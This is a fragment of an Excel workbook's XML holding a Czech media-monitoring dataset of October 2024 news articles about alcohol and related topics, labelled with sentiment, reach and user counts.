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C:\Users\matyaslevinsky\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{03796EF3-8DFE-46C3-8D81-7746B9B4CF19}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1068" yWindow="-108" windowWidth="29760" windowHeight="17496" xr2:uid="{4D03CBDF-3715-4F75-82A1-687A67F1CEC2}"/>
  </bookViews>
  <sheets>
    <sheet name="dataAlkoholML_test" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="0" hidden="1">dataAlkoholML_test!$A$1:$K$248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E9C9B0-60D9-4255-B92A-EF780660A7B2}" keepAlive="1" name="Query - dataAlkoholML_test" description="Connection to the 'dataAlkoholML_test' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=dataAlkoholML_test;Extended Properties=&quot;&quot;" command="SELECT * FROM [dataAlkoholML_test]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="17420" uniqueCount="11185">
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t>number</t>
  </si>
  <si>
    <t>first_id</t>
  </si>
  <si>
    <t>second_id</t>
  </si>
  <si>
    <t>title</t>
  </si>
  <si>
    <t>main_text</t>
  </si>
  <si>
    <t>datum</t>
  </si>
  <si>
    <t>sentiment</t>
  </si>
  <si>
    <t>keywords</t>
  </si>
  <si>
    <t>dosah</t>
  </si>
  <si>
    <t>uzivatele</t>
  </si>
  <si>
    <t>20241001_1_2998201028_b3ec9a10852cef6eafee.html</t>
  </si>
  <si>
    <t>b3ec9a10852cef6eafee</t>
  </si>
  <si>
    <t>Uklízečky trpí noční prací. 70 % trápí nedostatek spánku, večerní a noční směry mají negativní vliv na rodinný a partnerský život</t>
  </si>
  <si>
    <t>Uklízečky trpí noční prací. 70 % trápí nedostatek spánku, večerní a noční směry mají negativní vliv na rodinný a partnerský život Polovina úklidových pracovníků stále pracuje mimo běžnou denní směnu. Jsou na tom v mnoha ohledech hůře než ti, kteří pracují během dne a mnoha z nich to činí problémy. 70 % pracujících v nočních směnách uvádí, že nemají dostatek spánku, vyplynulo to z průzkumu zaměřeného na dopady jejich pracovních rozvrhů na zdraví, pohodu a životy. „Průzkum ukázal, že většina uklízečů pracujících v nočních směnách uvádí, že nemá dostatek spánku, stejně jako polovina uklízečů pracujících v ranních a večerních směnách. To má vliv na jejich zdraví a kondici, mohou být více unavení a nemocní. Nemají také dostatek času a energie na svoje blízké,“ uvádí Milada Skutilová, generální ředitelka české pobočky Kärcher a dodává: „Pracovní rozvrhy večerních a nočních směn výrazně narušují také soukromí, sociální a rodinný život těchto pracovníků. Zvláště negativní dopad má tento náročný režim na jejich vztahy s dětmi a partnery.“ Úklidoví pracovníci, kteří pracují pouze na denní směny, lépe spí, mají lepší stravovací návyky, konzumují méně cigaret a alkoholu a vykazují menší účinky na jejich duševní zdraví než jejich kolegové, kteří pracují na jiné směny. 55 % respondentů průzkumu uvedlo, že pracuje 20 až 40 hodin týdně. Více než čtvrtina uvedla, že pracuje více než 40 hodin týdně. 26 % respondentů uvedlo, že pracují ve více než jednom zaměstnání. U těchto úklidových pracovníků pak o 30 % vyšší pravděpodobnost, že budou pracovat více než 40 hodin týdně. 7 z 10 uklídových pracovníků nemá na výběr a musí pracovat večer či v noci Sedm z deseti uklízečů, kteří pracují mimo denní směnu, tak činí z nutnosti. Ať už kvůli vyšším mzdám, které zahrnují příplatky za noční směny nebo možnost pracovat na delší úvazek. Nebo proto, že denní směny pro ně nejsou dostupné a nemají tak na výběr. Jejich práce, kterou provázejí výše uvedené negativní jevy je pak navíc ještě podceňovaná. „Zajišťují čistotu a hygieničnost prostředí, v němž se každodenně pohybujeme a záhy si uvědomíme, že bez nich to nejde. Pracují navíc velmi často také v noci, což s sebou nese mnoho komplikací. A pak si uvědomíme, že práce uklízečky patří v Česku mezi nejpodceňovanější a nejpřehlíženější,“ říká Milada Skutilová ze společnosti Kärcher a dodává: „Proto jsme se rozhodli i do České republiky rozšířit iniciativu Thank Your Cleaner Day, jež slouží k ocenění tvrdě pracujících úklidových pracovníků a pracovnic.“ „Vnímání prestiže některých povolání se ale v posledních letech posouvá. Jinak v posledních letech lidé vnímají práci a zásluhy zdravotnického personálu či učitelů. Jinou optikou by si zasloužili být vnímáni i úklidoví pracovníci, kteří zajišťují čistotu a hygieničnost prostředí, v němž se každodenně pohybujeme,“ dodává Tomáš Pavlíček z pracovního portálu Prace.cz Průzkum Working against the clock byl realizován na vzorku více než 2 500 profesionálních uklízečů z 32 zemí na třech kontinentech. (1.10.2024)</t>
  </si>
  <si>
    <t>Negativní</t>
  </si>
  <si>
    <t>467</t>
  </si>
  <si>
    <t>96</t>
  </si>
  <si>
    <t>20241001_10_2997962643_543cd0c5f486357b1342.html</t>
  </si>
  <si>
    <t>543cd0c5f486357b1342</t>
  </si>
  <si>
    <t>Povodně a pivo</t>
  </si>
  <si>
    <t>Povodně a pivo Rubrika: S tužkou za uchem Máte dost pitné vody, otázala jsem se známého v povodněmi zasaženém Jesenicku. Odpověděl jako vždy s dávkou nadsázky: Proč vody? Já mám pivo , to mi stačí. Znám ho a vím, že bez piva ani krok, že tento nápoj patří k jeho domácí štábní kultuře a že je stále dobře předzásobem. Stejně jako humorem, který ho neopouští ani v nejzákeřnějších okamžicích života. Autor: Eva Brixi Autor person Eva Brixi Rubrika transition_slide S tužkou za uchem</t>
  </si>
  <si>
    <t>Pozitivní</t>
  </si>
  <si>
    <t>42000</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>20241001_100_2995557313_a639bbd38c4eb39c79a7.html</t>
  </si>
  <si>
    <t>a639bbd38c4eb39c79a7</t>
  </si>
  <si>
    <t>Ostrovy, na kterých se nekrade. To jsou Orkneje, ráj prehistorických památek a nádherných scenerií</t>
  </si>
  <si>
    <t>Shrnutí Bába pod kořenem míří do kin. Adaptaci českého bizáru napsal scenárista Elišky a Damiána Známá reportáž o tzv. bábě pod kořenem. | TV Nova Takové jsou alespoň plány zakladatele pražského kina Balt, Davida Paškeviče. Kino si staví jméno na tom, že často promítá snímky pochybné kvality a diváci si zde mohou užít nevšední, alkoholem obohacený zážitek. O tom, že se v Baltu bizáru nebojí, svědčí fakt, že Paškevič s Michalem Přibylem letos uvedli už dokument Mortal Kára zabývající se vznikem dokumentu o svatbě Jiřího Káry i jeho následném fenoménu. Ve snímku nazvaném Kořenový vězeň však chtějí jít ještě mnohem dál. 75 % Skutečný příběh Zdeňky Novotné, která se osudového dne při procházce lesem zaklínila pod stromem a nalezena kamarády byla až po několika hodinách, přičemž ji za chladné noci zahřívala její moč, se dočká poněkud přepálené aktualizace. Paškevič a jeho tým okolo virálního fenoménu vystaví příběh jak z těch nejobskurnějších amerických béček. Hlavní hrdinka Zdena totiž ve filmu dle synopse z oné noci zapomněla jednu zásadní vzpomínku – byla totiž znásilněna členem stromové rasy, které hrozí vyhynutí. Nyní je hlavní hrdinka těhotná a čeká jakéhosi stromového hybrida. Do příběhu pak zasáhne také Lord Špekáček, oživlý buřt, který spadl jednomu z táborníků na zem. „Rádi bychom se přiblížili snímkům, jako je The VelociPastor, CarousHell nebo z českého rybníčku skvělému filmu Párty Hárder: Summer Massacre,“ přibližují tvůrci svůj záměr v oficiálních materiálech ke kampani na webu Hithit. „Chceme natočit tak špatný film, až bude skvělý,“ dodává Paškevič v promo videu. Přijde vám to celé šílené? Tak věřte, že je to celé ještě šílenější. Scénář má totiž na starosti David Litvák , autor jednoho z nejhůře hodnocených seriálů posledních let, Elišky a Damiána, či primáckého propadáku Jetelín. Což je volba, která se jeví být v duchu projektu tak podivnou a nevhodnou, až může být dobrá. Kořenový vězeň: trailer | Balt Cinema Tvůrci tedy aktuálně rozjeli kampaň na platformě Hithit, která by měla pomoci chystaný projekt rozjet. K natočení snímku ve skromných podmínkách hodlají autoři vybrat aspoň 150 tisíc korun, pro pohodlné natočení podle plánu ovšem potřebují minimálně 600 tisíc korun, za 900 tisíc slibují tvůrci i přidání speciálních efektů a animovanou historku o vzniku lidstva. Zatím se dá jen těžko odhadovat, jak moc budou ve své snaze úspěšní, rádi by ovšem výsledek poslali do kin už příští červen v rámci béčkového festivalu Naruby v kině Balt . „Ale věřím, že to uvidí i lidé v desítkách dalších kin po republice. Například zmiňovaný dokument Mortal Kára promítalo už 36 kin. A dostat se do multiplexu by bylo neuvěřitelné, považoval bych to za zázrak,“ řekl Paškevič v rozhovoru pro web CzechCrunch a chce lidi zejména královsky pobavit. „Oslovili jsme původního reportéra Davida Pika a nápad se mu líbil. Ale jeho účast záleží i na povolení TV Nova. Ozvali jsme se samozřejmě i paní Zdeně, ale bohužel bez úspěchu,“ dodává Paškevič v rozhovoru. Tak uvidíme, zda budou příští léto lidé po celé republice volat v kinech „Zdenoooo!“ Chtěli byste něco takového vidět? Podívejte se na žebříček nejlepších českých komedií podle databáze Kinoboxu. Zdroj: CzechCrunch , kino Balt, HitHit Související osoby Autor: Milan Rozšafný Autor person Libor Hruška</t>
  </si>
  <si>
    <t>Neutrální</t>
  </si>
  <si>
    <t>422</t>
  </si>
  <si>
    <t>446</t>
  </si>
  <si>
    <t>20241001_11_2997843126_dac4e441cbdbd43fe3f3.html</t>
  </si>
  <si>
    <t>dac4e441cbdbd43fe3f3</t>
  </si>
  <si>
    <t>Kombucha Nupreme nově také ve variantě Cola</t>
  </si>
  <si>
    <t>Kombucha Nupreme nově také ve variantě Cola Rubrika: novinky Ikonické nápoje s kolovou chutí se v 90. letech staly synonymem svobody. Nyní může být ale kolová příchuť synonymem spokojeného zažívání a zdravého osvěžení. Nupreme právě na trh uvádí novinku: kombuchu s příchutí koly. Doplní tak již úspěšnou kombuchu ve variantě zelený čaj a yerba maté s malinou. Kombucha je nápoj vzniklý fermentací, což je přírodní proces bez přítomnosti aditiv či dalších umělých chemických látek. Jeho základ je oslazený odvar z čaje nebo yerba maté. To kouzlo, díky němuž v něm vznikají všechny prospěšné látky, má na svědomí kolonie symbiotických bakterií a kvasinek. Zatímco probíhá fermentace a ony se sytí cukrem v nápoji, vznikají jejich činností živiny, na kterých si smlsne vaše zažívání i vitalita. Když je navíc kombucha nepasterizovaná, jako v případě Nupreme, zachovává si všechny svoje benefity, včetně všech nut rientů a enzymů. Kdyby ale pasterizací prošla, celý proces by se zastavil, a pozitiva nápoje by se tak znehodnotila. A to by byla škoda, kombucha se v nepasterované formě totiž vyznačuje: ● přítomností probiotických kultur, díky nimž podporuje harmonii střevního mikrobiomu a dobré zažívání; ● obsahem antioxidantů, které pomáhají bojovat proti volným radikálům a podporují detoxikaci organizmu; ● nízkým podílem cukru, který postupným dozráváním dále klesá; ● povzbuzujícími účinky, díky nimž je kombucha vynikající alternativou ke kávě; ● osvěžující chutí, s níž bude dodržování pitného režimu ještě snazší. A jaký je původ surovin? Každá šarže kombuchy Nupreme má certifikaci bioproduktu, což znamená, že všechny základní suroviny pocházejí z ekologického zemědělství bez použití syntetických pesticidů, herbicidů nebo geneticky modifikovaných organizmů (GMO). Kombucha Nupreme ve variantě Cola má základ z nálevu meduňky a zeleného čaje (v poměru 50 : 50). Slazená je třtinovým cukrem. A obsahuje pouze přírodní aroma. Kombucha jemně perlí na jazyku, což je způsobeno přírodní fermentací. Pár hodin v lednici jí jen prospěje, protože dostanete ještě větší dávku osvěžení. A také to zabrání tomu, aby vám zralejší kombucha při otevírání vypěnila. Udělejte z ní součást svých oblíbených míchaných nápojů s alkoholem i bez. Zkuste v receptuře drinků nahradit šumivé víno nebo Prosecco právě kombuchou. Nebojte se ji přidat do koktejlů nebo smoothie. Kombucha Nupreme ve variantě Cola je již nyní dostupná na nustore.cz a do prodejen sítě dm dorazila koncem srpna. Autor: (tz) Autor person tz Rubrika transition_slide novinky</t>
  </si>
  <si>
    <t>Ambivalentní</t>
  </si>
  <si>
    <t>20241001_12_2997735304_ae594e5cb1607a0b2ab9.html</t>
  </si>
  <si>
    <t>ae594e5cb1607a0b2ab9</t>
  </si>
  <si>
    <t>Karel Gott vydělává i 5 let po smrti svým dědicům neuvěřitelné částky. Tipnete zhruba kolik?</t>
  </si>
  <si>
    <t>Karel Gott vydělává i 5 let po smrti svým dědicům neuvěřitelné částky. Tipnete zhruba kolik? close + 4 fotografie Dědictví Karla Gotta bylo svého času velké téma. Ať už za jeho života, nebo i po jeho smrti. Mistr měl totiž několik příbuzných, se kterými se chtěl vyrovnat už předem. Ne všem se to zamlouvalo, a tak se samozřejmě strhnul humbuk. Co se tehdy stalo a kdo je se svým dílem nespokojený? Dědictví Karla Gotta není jen to, které Mistr nashromáždil za svůj život. A i to byla poměrně slušná částka, za šedesát let svého profesionálního vystupování vydělal něco přes miliardu. Nicméně ti, kteří jsou uvedení jako dědicové, si přijdou na slušnou částku i poté, co již zpěvák nežije. Jak je to možné? Stovky tisíc korun díky tantiémům Jedná se o takzvané tantiémy, tedy poplatky za skladby, které můžete dennodenně slýchat z rádií a za které musí právě ona rádia platit. Na ty má interpret nárok díky autorskému zákonu, který tak stanovuje až do padesáti let od vydání písně. Podle webu MF DNES tak za svůj život Mistr inkasoval ročně až stovky tisíc korun. Kolik je ale přesná částka se neví. Rádia tento poplatek odevzdávají Intergramu, což je kolektivní správce práv umělců. Peníze pak umělcům přerozděluje sám. Hlavní příjem ovšem Gottovi přicházel z jeho koncertů a prodaných desek, kterých v celém světě prodal přes 50 milionů. Mnohé zdroje uvádějí, že Mistrův majetek dosahoval výše až 900 milionů korun. Dominice Gottové šest milionů nestačí Karel Gott s námi není už dlouhých pět let, když ovšem ještě Mistr žil, dohodl se se svými dcerami Dominikou a Lucií, že když jim dá každé šest milionů korun, vzdají se po jeho smrti nároku na dědictví. To znamená, že vše posléze připadne jeho ženě Ivaně a dvěma nejmladším dcerám, Charlottě Elle a Nelly Sofii . S tímto měla problém hlavně Gottova nejstarší dcera Dominika , která žije dlouhodobě ve Finsku a se svou macechou Ivanou nemají úplně dobré vztahy. „Nemáme spolu žádný kontakt. Nepíšeme si, nevoláme si. Nic se nezměnilo,“ prozradila Dominika Gottová webu CNN Prima News . „Rozhodla jsem se, že už to nebudu řešit. Kdo se chtěl napakovat, se napakoval. Myslím, že by se táta divil,“ pokračuje ve stýskání Dominika , která si podle mnohých médií ve Finsku nežije zrovna na vysoké noze. Ve spojení s jejím jménem padají slova “ alkohol ” a “dluhy”. Lucie není Dominika , Ivana se s ní dohodla Jak se píše na webu Médium, Gottová zvažuje návrat do Česka . Je to z toho důvodu, že douufá, že by jí její nevlastní matka Ivana mohla finančně vypomoci, protože podle Dominiky zdědila spoustu peněz. Pracovat prý ale prvorozená Gottova dcera nechce. Úplným opakem Dominiky je pro vdovu Ivanu Mistrova druhá dcera Lucie. Dámy spolu mají skvělý vztah, Ivana chtěla Lucii dokonce zpětně znovu zahrnout do dědického řízení, z notářských důvodů to ovšem ale nebylo možné. Ivana se tedy rozhodla alespoň Lucii posílat měsíční apanáž pro ni i její tři děti. Od roku 2020 by tedy Lucie měla od Ivany dostávat 15 000 korun a 7000 korun na děti, jakožto příspěvek. Karel Gott za svůj život “nastřádal” také mnoho nemovitostí, nicméně všechny postupem času porozdával mezi své příbuzné. Jediné, co tedy oficiálně vlastnil až do své smrti, byla garáž v pražských Košířích .</t>
  </si>
  <si>
    <t>211760</t>
  </si>
  <si>
    <t>115560</t>
  </si>
  <si>
    <t>20241001_13_3001074180_417e2b02aa03d49e9679.html</t>
  </si>
  <si>
    <t>417e2b02aa03d49e9679</t>
  </si>
  <si>
    <t>Řidič tvrdil plzeňským strážníkům, že za jeho styl jízdy může Margotka</t>
  </si>
  <si>
    <t>Řidič tvrdil plzeňským strážníkům, že za jeho styl jízdy může Margotka 1.10.2024 Hlídka plzeňské městské policie si v sobotu před třetí hodinou ráno, na křižovatce ulic Ukrajinská a Americká, všimla vozidla, které mělo očividné „problémy“ s plynulou a bezpečnou jízdou. Řidič při odbočování kolem najel na zvýšený obrubník a jako bonus pak zastavil přímo v zastávce MHD. Strážníci se jej rozhodli zkontrolovat. Když přistoupili k okénku, uvítal je výrazný alkoholový odér. 25letý muž za volantem se rozhodl situaci vysvětlit svérázným způsobem. Na dotaz, zda před jízdou požil alkohol , pravil s naprostou vážností: „Měl jsem Margotku.“ Dechová zkouška, kterou řidič absolvoval, ovšem ukázala hodnotu 1,74 promile. Vypadá to tedy, že pokud opravdu sušenku snědl, byla to verze „s rumem, ale bez čokolády“. Pro důvodné podezření ze spáchání trestného činu byl muž předán na místě policistům. ...</t>
  </si>
  <si>
    <t>300</t>
  </si>
  <si>
    <t>299</t>
  </si>
  <si>
    <t>20241001_14_2997705268_c777ef6648395468c8b3.html</t>
  </si>
  <si>
    <t>c777ef6648395468c8b3</t>
  </si>
  <si>
    <t>Řidič tvrdil plzeňským strážníkům, že za jeho styl jízdy může Margotka Foto: MP Plzeň Plzeňský kraj Hlídka plzeňské městské policie si v sobotu před třetí hodinou ráno, na křižovatce ulic Ukrajinská a Americká, všimla vozidla, které mělo očividné „problémy“ s plynulou a bezpečnou jízdou. Řidič při odbočování kolem najel na zvýšený obrubník a jako bonus pak zastavil přímo v zastávce MHD. Strážníci se jej rozhodli zkontrolovat. Když přistoupili k okénku, uvítal je výrazný alkoholový odér. 25letý muž za volantem se rozhodl situaci vysvětlit svérázným způsobem. Na dotaz, zda před jízdou požil alkohol , pravil s naprostou vážností: „Měl jsem Margotku.“ Dechová zkouška, kterou řidič absolvoval, ovšem ukázala hodnotu 1,74 promile. Vypadá to tedy, že pokud opravdu sušenku snědl, byla to verze „s rumem, ale bez čokolády“. Pro důvodné podezření ze spáchání trestného činu byl muž předán na místě policistům. Jana Pužmanová MP Plzeň Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Hlavní zprávy</t>
  </si>
  <si>
    <t>19890</t>
  </si>
  <si>
    <t>12820</t>
  </si>
  <si>
    <t>20241001_15_2997671718_4315eee5041f059cad44.html</t>
  </si>
  <si>
    <t>4315eee5041f059cad44</t>
  </si>
  <si>
    <t>Historické tržní dny</t>
  </si>
  <si>
    <t>Historické tržní dny Sobota 5. 10. 2024 od 10.00 Konec: Neděle 6. 10. 2024 do 18.00 Vstupné: 200 Kč Historický park Bärnau - Tachov Naaber Str. 5b, 95671 Bärnau Mladí i staří byli v den středověkého trhu na nohou. Potulní kupci přinášeli nejen zboží z daleka, které bylo možné obdivovat, ale také zprávy a novinky z celé země – noviny dlouho neexistovaly! Lidé společně postávali, nakupovali a prodávali, diskutovali o novinkách a vypili hrnek nebo dva čerstvě uvařeného piva . Během historického víkendu na trhu obdivujte autentické zboží a repliky obchodníků, sledujte ukázky řemesel a ponořte se do středověkého světa tržního dne. Autor: Matouš Horáček, Jiří Prexl, jiri.prexl@ketnet.cz Autoři Matouš Horáček person Jiří Prexl person jiri.prexl@ketnet.cz</t>
  </si>
  <si>
    <t>1250</t>
  </si>
  <si>
    <t>719000</t>
  </si>
  <si>
    <t>20241001_16_2997671813_0b8ba5d0c69ca3678681.html</t>
  </si>
  <si>
    <t>0b8ba5d0c69ca3678681</t>
  </si>
  <si>
    <t>Cigára: Když se z kouření stává lifestyle s kapkou šmrncu</t>
  </si>
  <si>
    <t>Cigára: Když se z kouření stává lifestyle s kapkou šmrncu autor: Redakce Nezdrave.cz | 01.10.2024 | Cigára Kouření cigaret se stalo víc než jen zlozvykem. Pro mnohé je to otázka stylu, způsob, jak zapadnout do crowds, a mnozí z nás to vnímají jako nepsané pravidlo moderního yuppie života. V dnešním článku se ponoříme do světa tabáku a cigaret, od jejich fascinující historie až po současné trendy, které pokukují po ironické estetiky a všech těch malých okamžicích, kdy je potřeba se zastavit a užít si života. Tak se usaďte, zapněte se a připravte se na doslova uzenou jízdu. Cigaretová historie, jak ji neznáte Když se řekne cigareta, většina z nás si okamžitě vybaví kouř, kroužky dýmu a možná i kousek nostalgie. Ale víte, že cigarety byly původně součástí rituálů u domorodých obyvatel Ameriky ? Tato tradice se později dostala do Evropy , kde se z cigaret stala hotová móda. Jakoby nikotin bral zvláštní zasvěcení do umění a elegance, přičemž kouřící aristokraté si vychutnávali „to, co je na dosah ke srdečním záležitostem“ – víno a cigarety, samozřejmě! Není divu, že se kouření stalo synonimem statusu, i když s přibývajícími informacemi o zdraví dostává jeho popularita pořádné rány. Jedním z překvapivých faktů je, že průměrný kuřák denně vstřebá množství nikotinu odpovídající čtyřem až pěti kávám. Takže pokud se vám jeden ranní espresso zdá málo, co takhle začít s cigárem na terase? Kombinace kancelářského stresu a povzbudivého tabáku je zkrátka neodolatelná. Ne, že bychom si to ospravedlňovali, ale je to něco jako kouřit s třídou. Kouření v době e-cigaret Dnešní doba však přinesla nové varianty, jak se dostat k nikotinu, a e-cigarety už dávno nejsou jen doménou hipsterů s jejich skvělými knírky. Tyto moderní zázraky techniky jsou schopny napodobit chuť tabáku bez fyzického kouření. Jenže pozor, pánové – přechodem na „bezkouřový“ styl můžete snáze sklouznout do podezřelé elegance a atmosféry barů, kde vám někdo cizí začne nabízet citronový tvarohový koláč. Mějte na paměti, e-cigarety jsou módní, ale postavu vám nezachrání. Oslava životního stylu „Carpe Diem“ je teď prostě bez kouře? U některých to asi platí, ale my víme, že milovníci atmosféry a tradic se nehodlají vzdát cigaret. Jak už to bývá, schopnost užívat si život se pečlivě odvíjí v obklopení těch pravých lidí, a cigareta je jen špičkou ledovce. Spousta lidí si potrpí na romantiku a magii kouře, přičemž decentně rituálně vydechují dým, jakoby šlo o vlastní modlitbu. Vize cigaret z příběhů Almodóvara se mísí se současným nátlaku na čisté alternativy – tak co, vyberete si větší hněv nebo stejnou stálost při svíčkách? Bahno nebo víno ? Kouření a osobní branding Popravdě, trend „smoking is the new black“ zasypává svět a kolegové to prostě neberou na lehkou váhu. Dnešní generace se nebojí hledat svou identitu i v tajích cigaret, ať už se nám to líbí nebo ne. Všichni vidí zrcadlo, které nám ukazuje, jakou osobnost máme – a kouření ať již cigaret nebo e-cigaret dodává ten chybějící šmrnc. S cigaretou v ruce vypadáte prostě fancy, i když se tak úplně necítíte. Cigarety už nejsou jen cigarety; stávají se prvky osobního brandingu. Kdo by v dnešní době vyrazil ven bez svého oblíbeného balení? Každý milovník tabáku ví, že je to otázka dojmů – pokud pokušení s cigaretou není po ruce, rázem se stanete nedobrovolným účetním. I když si pár kamarádů možná vytvoří sousloví „tohle je pro kluky“, ten, kdo jde ven bez cigarety, riskuje, že se stane bezbarvým grafikem v dávno zapomenuté kleci. Takže, vy yuppies a carpe diem lidé, kteří se nebojí vychutnat si život v plné parádě, mějte na paměti, že cigarety nejsou jen o nikotinu, ale o životním stylu. Kdo jim dodá ten pravý šmrnc, bude se cítit jako na vrcholu světa. Tak si užívejte, kouření je víc než jen zlozvyk – je to umění, a ochutnat to, co si sami namícháte, je to pravé kouření. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>40</t>
  </si>
  <si>
    <t>20241001_17_2997671761_c50e61b16121a4463c1f.html</t>
  </si>
  <si>
    <t>c50e61b16121a4463c1f</t>
  </si>
  <si>
    <t>Podnikaní́ na Vysočině vévodí́ zpracování kmínu a střechařina</t>
  </si>
  <si>
    <t>Podnikaní́ na Vysočině vévodí́ zpracování kmínu a střechařina 1.10.2024 V Kraji Vysočina získala titul Volkswagen Firma roku 2024 společnost Náš kmín, zpracovatel českého dvouletého kmínu. Mezi živnostníky dosáhl na titul MONETA Živnostník roku 2024 klempíř, pokrývač a tesař Roman Starý . Oborem vítězného živnostníka Romana Starého je klempířství, pokrývačství, tesařství, prodej střech a jejich doplňků. Dělá střechy na klíč a prodává spojovací materiál. Začátky podnikání byly velice složité a opatrné. Navazování obchodních kontaktů nebylo totiž vždy jednoduché. „Budování nové klempířské dílny a zázemí proběhlo v roce 2011. Tento krok se ukázal jako krok správným směrem a postrčil nás do popředí, před konkurenci. Později se nám podařilo otevřít také kamennou prodejnu se spojovacím materiálem,“ říká Roman Starý . Stěžejní činností ale stále zůstává střechařina a převážně klempířina. V této oblasti má největší zkušenosti, praxi a vybavení. Plány do budoucnosti má veliké, neustále se rozvíjet, učit se nové věci, dále budovat zázemí a pořizovat dokonalejší vybavení, aby měl stále náskok před konkurencí. Za necelých dvacet let podnikání se to docela slušně daří. Od konkurence se odlišuje kvalitou práce, rychlostí provedení a použitím kvalitních materiálů. „Zvítězil zaslouženě, protože se zabývá klasickým, starým řemeslem a svoje zkušenosti předává navíc mezi studenty škol. Jeho práce je velmi žádaná, termíny má obsazené na dlouhé měsíce dopředu,“ uvedla za porotu Ludmila Žáková z MONETA Money Bank. Druhé místo získala chovatelka včel a producentka medu Markéta Krejčová . Bronz si odváží Lukáš Kochrda věnující se vývoji a výrobě dětských Montessori motorických pomůcek. „Naše malá rodinná firma se zaměřuje především na zpracování a popularizaci našeho jediného a posledního koření, které se v současné době stále ještě pěstuje ve větším měřítku na našem území, a tím je český dvouletý́ kmín,“ říká Karel Jonák , spolumajitel vítězné firmy Náš kmín. Právě na Vysočině se v 20. století začal intenzivně šlechtit kmín. Podařilo se zde vyšlechtit ty nejlepší odrůdy, které patří mezi světovou špičku. Společnost aktuálně vytvořila spolupráci se značkou Vitana , hypermarkety Globus či slovenskou Maspomou. Mezi zákazníky patří především maloobchodní sektor, ale poměrnou část zabírá i gastro segment, který́ neustále roste a začíná se pozvolna měnit, takže kuchaři, manažeři a majitelé restaurací chtějí do svých podniků přinést kvalitu i v tak obyčejném sortimentu, jako je koření. Snaží se, aby byl český kmín popularizován v médiích. Každý́ rok investuje značnou část zisku do nových technologií, aby byla co nejvíce soběstačná a rozšířila výrobu. „Ačkoli se jedná o menší firmu, tak je dobře známá a oblíbená v celém regionu jako dodavatel kvalitního kmínu. Zřejmý je důraz na udržitelnost produkce a zachování tradice pěstování kmínu v regionu, a tedy v České republice ,“ okomentoval vítěze za porotu Dušan Klimek ze společnosti Volkswagen . Stříbro vybojovala společnost Řeznictví Stejskal , zpracovatel a výrobce masných výrobků. Třetí místo bere firma FOUL, která vyrábí a vyvíjí prémiové vybavení pro fotbalisty. Vyhlášen byl rovněž vítěz doprovodné kategorie MONETA Živnostník roku Srdcař oceňující živnostníky, kteří ve svém oboru dlouhodobě podnikají a jsou své práci zcela oddáni. Srdcař je člověk, který doslova žije pro to, co dělá a nechává v tom kus svého srdce. V Kraji Vysočina získala toto ocenění Renata Veselá věnující se výrobě šperků z korálků . Vítězové krajského kola se stávají zároveň celorepublikovými finalisty. Slavnostní vyhlášení celostátních výsledků soutěží Volkswagen Firma roku 2024 a MONETA Živnostník roku 2024 se uskuteční 11. prosince na pražském Žofíně . „Přínos Firmy a Živnostníka roku vidím především ve vytváření příležitostí pro setkávání a sdílení zkušeností inspirativních lidí, zástupců firem malých i velkých z různých podnikatelských oborů, s různým příběhem. Skupina VINCI Construction CS vytváří svými projekty lepší místo nejen pro život, ale i pro podnikání. Staví silnice, dálnice, železnice, mosty i vodohospodářská díla či průmyslové objekty, byty i relaxační a sportovní zóny. Na svých projektech klademe čím dál větší roli na péči o životní prostředí, proto jsme se stali letos poprvé partnery nové soutěžní kategorie Udržitelné podnikání roku. Chceme tak vyzdvihnout nápady a řešení živnostníků a firem, které díky přijímání principů udržitelnosti a využívání moderních technologií podporují nové obchodní příležitosti, a hlavně přispívají k lepšímu životnímu prostředí, říká Iveta Štočková, tisková mluvčí Skupiny VINCI Construction CS. Volkswagen Firma roku 2024 Kraje Vysočina: 1. Náš kmín s.r.o. – zpracovatel českého dvouletého kmínu (Petráveč) 2. Řeznictví Stejskal s.r.o. – zpracování a výroba masných výrobků ( Chotěboř ) 3. FOUL s.r.o. – výroba a vývoj prémiového vybavení pro fotbalisty ( Třebíč ) MONETA Živnostník roku 2024 Kraje Vysočina: 1. Roman Starý – klempíř, pokrývač a tesař (Bobrová) 2. Markéta Krejčová – chov včel a produkce medu ( Pacov ) 3. Lukáš Kochrda – vývoj a výroba dětských Montessori motorických pomůcek (Doupě) MONETA Živnostník roku Srdcař 2024 Kraje Vysočina: Renata Veselá – výroba šperků z korálků ( Jihlava ) Ekonomicky nejúspěšnější firma roku 2024 Kraje Vysočina: Domácí dobroty s.r.o. – provoz sušárny ovoce a výroba ovocných svačinek (Ostašov) Fotografie z vyhlašování jsou zde. © Firma roku / Živnostník roku, 2024 Tento web běží na solidpixels. Abychom vám usnadnili procházení stránek, nabídli přizpůsobený obsah nebo reklamu a mohli anonymně analyzovat návštěvnost, využíváme soubory cookies, které sdílíme se svými partnery pro sociální média, inzerci a analýzu. Jejich nastavení upravíte odkazem "Nastavení cookies" a kdykoliv jej můžete změnit v patičce webu. Podrobnější informace najdete v našich Zásadách ochrany osobních údajů a používání souborů cookies. Souhlasíte s používáním cookies? Zprostředkovávají základní funkčnost stránky, web bez nich nemůže fungovat. Analytické cookies Počítají návštěvnost webu a sběrem anonymních statistik umožňují provozovateli lépe pochopit své návštěvníky a stránky tak neustále vylepšovat. Marketingové cookies Shromažďují informace pro lepší přizpůsobení reklamy vašim zájmům, a to na těchto webových stránkách i mimo ně. Autor: solidpixels. || solidpixels., https://www.solidpixels.com</t>
  </si>
  <si>
    <t>18</t>
  </si>
  <si>
    <t>20241001_18_2997671190_454c49678a128c210cbd.html</t>
  </si>
  <si>
    <t>454c49678a128c210cbd</t>
  </si>
